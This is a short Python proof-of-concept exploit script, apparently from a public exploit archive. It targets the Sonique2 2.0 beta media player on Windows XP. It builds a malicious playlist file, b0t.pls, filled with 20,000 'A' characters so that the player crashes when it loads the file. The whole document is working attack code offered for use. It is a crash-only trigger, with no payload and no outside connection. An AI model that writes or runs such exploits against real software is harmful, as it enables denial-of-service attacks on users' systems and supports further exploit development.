#!/usr/bin/python # # Title: Sonique2 2.0 Beta Build 103 Local Crash PoC # Found by: b0telh0 # Link: http://download.softpedia.com/dl/85a8a9ea142e83438019ed775c0d039f/4b59ca05/100006707/software/multimedia/audio/s2beta_103_install.zip # Tested on: Windows XP SP3 crash = "\x41" * 20000 try: file = open('b0t.pls','w'); file.write(crash); file.close(); print "[+] Created b0t.pls file." except: print "[-] Error cant write file to system."